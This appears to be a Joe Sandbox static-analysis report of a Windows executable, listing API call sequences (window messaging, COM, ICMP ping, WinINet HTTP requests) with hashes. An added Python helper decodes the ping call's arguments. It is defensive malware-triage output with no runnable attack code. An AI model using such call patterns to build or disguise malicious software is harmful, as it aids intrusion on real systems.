                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00146FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00146FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00146FCC
                                                        • _memset.LIBCMT ref: 00146FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00146FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00147067
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 1770641916d5cb8ad96f1e7bd119bab01d4f924f62a128007ee7f273d1455d0d
                                                        • Instruction ID: ca3abbb9c3048dc1f131ede13877b6772f65f5c3605bcf0c3b63716e13c99825
                                                        • Opcode Fuzzy Hash: 1770641916d5cb8ad96f1e7bd119bab01d4f924f62a128007ee7f273d1455d0d
                                                        • Instruction Fuzzy Hash: 95616C75A00248AFDB11DFA4CC81EEE77F9EF09710F10416AFA14AB2A1D771AE45DB90
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00116BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00116C18
                                                        • VariantInit.OLEAUT32(?), ref: 00116C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00116C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00116C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00116CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00116CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00116CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00116CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00116CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00116CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 1afd28ef104f4e3cc9137cf76d4d7448f7691e3be21862ddf829822bbe0a9e07
                                                        • Instruction ID: c3023c638f972db1f662cedac8bef69d56da02ca1ea67852d368e30701be763a
                                                        • Opcode Fuzzy Hash: 1afd28ef104f4e3cc9137cf76d4d7448f7691e3be21862ddf829822bbe0a9e07
                                                        • Instruction Fuzzy Hash: 0F415135A001199FCF04DF68D848EEEBBB9EF48354F058079E955E7361DB31A986CB90
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CoInitialize.OLE32 ref: 00138403
                                                        • CoUninitialize.OLE32 ref: 0013840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00152BEC,?), ref: 0013846E
                                                        • IIDFromString.OLE32(?,?), ref: 001384E1
                                                        • VariantInit.OLEAUT32(?), ref: 0013857B
                                                        • VariantClear.OLEAUT32(?), ref: 001385DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 143c066ac59e54af489f03b5b9a673741c2c57f57ecdd7fb422bea8705d91354
                                                        • Instruction ID: d180b8b5ab1321e535faaa1927c64555561a5c0102fbc38001c5c9112e7f5a05
                                                        • Opcode Fuzzy Hash: 143c066ac59e54af489f03b5b9a673741c2c57f57ecdd7fb422bea8705d91354
                                                        • Instruction Fuzzy Hash: 6D61CF70608312AFC714DF64D848FAEBBE8AF49754F04491DF9859B2A1CB70ED48CB92
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00135793
                                                        • inet_addr.WSOCK32(?), ref: 001357D8
                                                        • gethostbyname.WSOCK32(?), ref: 001357E4
                                                        • IcmpCreateFile.IPHLPAPI ref: 001357F2
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00135862
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00135878
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001358ED
                                                        • WSACleanup.WSOCK32 ref: 001358F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 2078df08164ad0626446a0c66578cd9195aeaceef88a99acdf4a0c67a61f5d4f
                                                        • Instruction ID: 5cb109cc76564500edfc3c880435f695f9e2b005cb60928bd25270cd40a773a1
                                                        • Opcode Fuzzy Hash: 2078df08164ad0626446a0c66578cd9195aeaceef88a99acdf4a0c67a61f5d4f
                                                        • Instruction Fuzzy Hash: F9518B35604600DFDB10EF25DC49B6ABBE5EF49B20F04496DF99ADB2A1DB30E841DB42
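The ICMP record above lists raw call arguments in hex, which only become meaningful once mapped onto the documented parameter order of each API. The Python helper below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It parses rows in the report's APIs format and decodes the WSAStartup version word and the IcmpSendEcho request size, reply size and timeout. The sample rows are copied from the record above and embedded as constructed input; `?` placeholders are kept as unknown rather than guessed. It assumes the 32-bit ICMP_ECHO_REPLY layout (28 bytes), which matches this 32-bit PE.

```python
"""Decode Joe Sandbox 'APIs' rows into argument meanings.

Added triage helper, not part of the Joe Sandbox report. The sample rows
are copied from the ICMP function record on this page; the constant
meanings follow the documented Win32 signatures of WSAStartup and
IcmpSendEcho. Assumption: a 32-bit target, where sizeof(ICMP_ECHO_REPLY)
is 28 bytes.
"""
import re
from typing import Optional

# Rows copied from the report record above (constructed test input).
SAMPLE_ROWS = """
• WSAStartup.WSOCK32(00000101,?), ref: 00135793
• inet_addr.WSOCK32(?), ref: 001357D8
• gethostbyname.WSOCK32(?), ref: 001357E4
• IcmpCreateFile.IPHLPAPI ref: 001357F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00135862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00135878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 001358ED
• WSACleanup.WSOCK32 ref: 001358F3
"""

ROW_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"      # ApiName.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?"                # optional (arg,arg,...)
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"       # ref: <call-site address>
)

# Documented parameter order. A '?' in the report means the value was not
# statically recoverable; it is kept as None instead of being guessed.
SIGNATURES = {
    "IcmpSendEcho": ["IcmpHandle", "DestinationAddress", "RequestData",
                     "RequestSize", "RequestOptions", "ReplyBuffer",
                     "ReplySize", "Timeout"],
    "WSAStartup": ["wVersionRequested", "lpWSAData"],
}

SIZEOF_ICMP_ECHO_REPLY_32 = 28  # 32-bit layout; the sample is a 32-bit PE


def parse_rows(text: str) -> list[dict]:
    """Turn report rows into {api, module, args, ref} dicts."""
    calls = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args: list[Optional[int]] = []
        if raw:
            for tok in raw.split(","):
                tok = tok.strip()
                args.append(None if tok == "?" else int(tok, 16))
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def named_args(call: dict) -> dict:
    """Map positional args onto documented names when the count matches."""
    names = SIGNATURES.get(call["api"])
    if not names or len(names) != len(call["args"]):
        return {}
    return dict(zip(names, call["args"]))


def decode_ping(calls: list[dict]) -> dict:
    """Summarise the ICMP echo sequence: Winsock version, sizes, timeout."""
    out: dict = {}
    for c in calls:
        a = named_args(c)
        if c["api"] == "WSAStartup" and a.get("wVersionRequested") is not None:
            v = a["wVersionRequested"]
            out["winsock_version"] = (v & 0xFF, v >> 8)  # MAKEWORD(major, minor)
        if c["api"] == "IcmpSendEcho" and a and "echo" not in out:
            req, rep, tmo = a["RequestSize"], a["ReplySize"], a["Timeout"]
            # The reply buffer must hold the reply header, the echoed
            # payload and 8 bytes of IP options, or IcmpSendEcho fails.
            minimum = SIZEOF_ICMP_ECHO_REPLY_32 + (req or 0) + 8
            out["echo"] = {
                "request_size": req,
                "reply_size": rep,
                "reply_size_ok": rep is not None and rep >= minimum,
                "timeout_ms": tmo,
            }
    return out


if __name__ == "__main__":
    print(decode_ping(parse_rows(SAMPLE_ROWS)))
```

Reading the decoded values: 0x101 requests Winsock 1.1, 0xFA0 is a 4000 ms timeout, and a 0x29 (41) byte reply buffer is exactly the 28-byte reply header plus a 5-byte payload plus the 8 bytes of IP options the API documentation requires, so the buffer is sized consistently for the 5-byte request. That length would fit the four-character "Ping" string listed under String ID plus a terminator, though the report itself does not show what RequestData points to.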
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0012B546
                                                        • GetLastError.KERNEL32 ref: 0012B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0012B5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 699ab69d74c694d2e337576e6879b53bbea89731dfd3f90de2139c9db0dba98d
                                                        • Instruction ID: a7451966ff737723c12c62552a12d3336cca7fd6d3700b7278774ae15000c307
                                                        • Opcode Fuzzy Hash: 699ab69d74c694d2e337576e6879b53bbea89731dfd3f90de2139c9db0dba98d
                                                        • Instruction Fuzzy Hash: 4431C435A04215DFCB04DF68E889FAE7BB4FF09300F148069F505DB292DB709A96CB81
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00119014
                                                        • GetDlgCtrlID.USER32 ref: 0011901F
                                                        • GetParent.USER32 ref: 0011903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0011903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00119047
                                                        • GetParent.USER32(?), ref: 00119063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00119066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: d9b26064a19449be8db412ac68bac75aba7b93f4f3b06aeea3abfb88f3b23945
                                                        • Instruction ID: 439edb4abe58a0278decf3a92a615f0ecdd56f348278b80a7c2f04ecdfcd489a
                                                        • Opcode Fuzzy Hash: d9b26064a19449be8db412ac68bac75aba7b93f4f3b06aeea3abfb88f3b23945
                                                        • Instruction Fuzzy Hash: BC21D678A00108BBDF08ABA0CC95EFEBB78EF49310F104169B961972F2DB755895DA20
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001190FD
                                                        • GetDlgCtrlID.USER32 ref: 00119108
                                                        • GetParent.USER32 ref: 00119124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00119127
                                                        • GetDlgCtrlID.USER32(?), ref: 00119130
                                                        • GetParent.USER32(?), ref: 0011914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0011914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: e6230e71bb44724dbe48ae4946a73713d421988536497dda6db755d5f4f113dd
                                                        • Instruction ID: 44600e461dc5d04541e29439c506b38598307229a8d7b5dd2b42fa02ea602b0e
                                                        • Opcode Fuzzy Hash: e6230e71bb44724dbe48ae4946a73713d421988536497dda6db755d5f4f113dd
                                                        • Instruction Fuzzy Hash: 4A2107B8A01108BBDF04ABA0CC85FFEBB78EF49300F014029F925972B2DB755895DB20
                                                        APIs
                                                        • GetParent.USER32 ref: 0011916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00119184
                                                        • _wcscmp.LIBCMT ref: 00119196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00119211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 98d8c10e17961048bafa7f4b90ac21c12812dacf6bca8797beda11e07ca0ca6f
                                                        • Instruction ID: 5bb8598e6638b5c4e81bf5ba2d66eb88a6062c3e32408784d9267f88da2eca9f
                                                        • Opcode Fuzzy Hash: 98d8c10e17961048bafa7f4b90ac21c12812dacf6bca8797beda11e07ca0ca6f
                                                        • Instruction Fuzzy Hash: B411597A248307BAFA192624DC1ADE777AC9B11330F200036FA24B15E2FF7168D15990
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 001388D7
                                                        • CoInitialize.OLE32(00000000), ref: 00138904
                                                        • CoUninitialize.OLE32 ref: 0013890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00138A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00138B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00152C0C), ref: 00138B6F
                                                        • CoGetObject.OLE32(?,00000000,00152C0C,?), ref: 00138B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00138BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00138C25
                                                        • VariantClear.OLEAUT32(?), ref: 00138C35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: 2a4c635420218b1fc3e82696526dde3f925742dff1649061e2d2062d3de81833
                                                        • Instruction ID: 31054f87d682b73f0b47aa2e9bf251541aa40a40a5f042e5f154daf5233f18b9
                                                        • Opcode Fuzzy Hash: 2a4c635420218b1fc3e82696526dde3f925742dff1649061e2d2062d3de81833
                                                        • Instruction Fuzzy Hash: F1C146B1208305AFD704DF24C88496BB7E9FF89748F00496DF98A9B261DB71ED46CB52
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00127A6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 622fc558432bcf947e8ce336ac310c0c06185958c86c1fc001ff00c0a5dc964a
                                                        • Instruction ID: 5a989fdeb0afa7a5bf5aa7448ecbff66bff3f442cc0c60bfdb27d3cbab810321
                                                        • Opcode Fuzzy Hash: 622fc558432bcf947e8ce336ac310c0c06185958c86c1fc001ff00c0a5dc964a
                                                        • Instruction Fuzzy Hash: 31B1907590822A9FDB00DFA4E885BBFB7F4FF09321F254429E501E7291D734A9A1CB90
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000CFAA6
                                                        • OleUninitialize.OLE32(?,00000000), ref: 000CFB45
                                                        • UnregisterHotKey.USER32(?), ref: 000CFC9C
                                                        • DestroyWindow.USER32(?), ref: 001045D6
                                                        • FreeLibrary.KERNEL32(?), ref: 0010463B
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00104668
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 40dcb73d62c56a7ad1d3359868ece8c6ef9383e8dce43f8e49a0956d39363ad8
                                                        • Instruction ID: 9cc0a7e150ac82bc0e04c2eae47a08e0cd42b65aff49acd16cabe27b81938662
                                                        • Opcode Fuzzy Hash: 40dcb73d62c56a7ad1d3359868ece8c6ef9383e8dce43f8e49a0956d39363ad8
                                                        • Instruction Fuzzy Hash: 19A157747012128FCB29EF14C994FBDF3A1AF05700F5142ADE94AAB2A2DB71AC56CF51
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0011A439), ref: 0011A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 48632207b596cbfbed71fb89ff0520efff4016216ffdcf9dc2f465a568bb5ca2
                                                        • Instruction ID: d32f2393d5d2243ae44014c260629e01f2e80bbce97f315ec8294da2e4395da8
                                                        • Opcode Fuzzy Hash: 48632207b596cbfbed71fb89ff0520efff4016216ffdcf9dc2f465a568bb5ca2
                                                        • Instruction Fuzzy Hash: 63919331605605AECB0CDFA0C852BEDFFB4BF04314F948139E959A7292DB316AD9CB91
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 000C2EAE
                                                          • Part of subcall function 000C1DB3: GetClientRect.USER32(?,?), ref: 000C1DDC
                                                          • Part of subcall function 000C1DB3: GetWindowRect.USER32(?,?), ref: 000C1E1D
                                                          • Part of subcall function 000C1DB3: ScreenToClient.USER32(?,?), ref: 000C1E45
                                                        • GetDC.USER32 ref: 000FCD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FCD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FCD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FCD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 000FCD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FCDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 982f4db58baef03338721f1893aaffb68e5cb939bd42ae4b80ccc511f7b2b0ef
                                                        • Instruction ID: 5b2f1168d5dc11e62ed052c8dac4496a8739c4849af0b6e808edc67582d67dcb
                                                        • Opcode Fuzzy Hash: 982f4db58baef03338721f1893aaffb68e5cb939bd42ae4b80ccc511f7b2b0ef
                                                        • Instruction Fuzzy Hash: 0D71CF3550020DDFDF659F64C981EFE3BB6FF49320F14426AEE556A6A6C7308881EB60
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00131A50
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00131A7C
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00131ABE
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00131AD3
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00131AE0
